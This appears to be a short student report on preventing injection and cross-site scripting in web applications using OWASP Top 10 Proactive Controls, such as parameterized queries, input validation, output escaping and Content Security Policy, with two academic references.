Introduction
In the modern digital world, hackers regularly use newly improved methods and strategies, including machine learning, artificial intelligence, and other security control tools that fasten the cyber-attack lifecycle (Higuera et al., 2020). Therefore, as a cyber security professional, one should be able to anticipate such turbulent threats and ensure the organization’s system remains secure by strengthening its defenses. With the aid of OWASP Top 10, professionals can mitigate cyber-attack threats for web applications (Mateo et al., 2020). This is a preliminary report on the preventive measures that could have been implemented to mitigate the security risks identified earlier in the development life cycle.
Risk One
One of the security risks identified during the development lifecycle is injection, which is described as the attacks that occur when compromised data is fed to a code interpreter through various mediums, such as input to the web application. Injection attacks harm the organization’s system as they compromise the integrity and confidentiality of data (Higuera et al., 2020). Through injection attacks, cyber attackers can also have the capacity to execute arbitrary code on the server, thereby allowing them to control certain elements of the program, potentially gaining control over systems. To prevent future attacks through injection, the OWASP Top 10 Proactive Controls recommend using a wide range of techniques, such as developing and integrating positive input validation throughout the system and utilizing parameterized queries (Higuera et al., 2020). Parameterized queries have recently proved effective in preventing injection attacks as they help separate data from the command, making it harder for attackers to inject malicious code into the system. Through positive input validation, the system could check whether the user input matches a predefined set of rules and rejects any input that does not align with the instructions in play (Mateo et al., 2020). On the same note, OWASP’s Top 10 Proactive Controls recommend validating and sanitizing user-friendly data in the future as the best way to prevent attacks through injection. Through validation, the system can clean up suspicious-looking data while thoroughly cleaning the suspicious areas.
Risk Two
Another risk featured in OWASP Top 10 identified during the security testing was cross-site scripting (XSS). Cross-site scripting threats occur when web applications offer attackers access to the system and add a custom code visible to other users. Such threats are malicious, especially to highly backed systems with lots of data. The attacks mainly steal the user’s credentials while sometimes redirecting users to malicious sites that fish for personal data (Mateo et al., 2020). According to OWASP’s Top 10 Proactive Control measures, the mitigation strategies for cross-site scripting include escaping untrusted HTTP requests while ensuring more advanced validation and sanitization, thereby protecting user-generated content (Higuera et al., 2020). By converting user input into a safe format that does not include executable malicious codes, the organization system can be strengthened against cross-site scripting risks (Higuera et al., 2020). Likewise, proactive controls recommend using a content security policy (CSP), a header that commands the web application on the kinds of content that are safe to load on the web page.
Conclusion
While the modern-day world has greatly improved because of the use of technology, there have been increasing threats of personal data, resulting in millions of dollars’ worth of data being lost to unauthorized personnel. As such, OWASP, an international non-profit organization, has dedicated itself to web application security. That said, several risks were identified in the security testing of the organization, including injection and cross-site scripting. According to proactive control measures, injection can be prevented through the use of positive input validation and the using of parameterized queries. On the other hand, cross-site scripting identified as one of the threats during the security tests can be prevented by using content security policy and escaping intrusted HTTP requests.
References
Higuera, J. R. B., Higuera, J. B., Montalvo, J. A. S., Villalba, J. C., & Pérez, J. J. N. (2020). Benchmarking Approach to Compare Web Applications Static Analysis Tools Detecting OWASP Top Ten Security Vulnerabilities. Computers, Materials & Continua, 64(3). doi:10.32604/cmc.2020.010885
Mateo Tudela, F., Bermejo Higuera, J. R., Bermejo Higuera, J., Sicilia Montalvo, J. A., & Argyros, M. I. (2020). On Combining Static, Dynamic and Interactive Analysis Security Testing Tools to Improve OWASP Top Ten Security Vulnerability Detection in Web Applications. Applied Sciences, 10(24), 9119. https://doi.org/10.3390/app10249119
write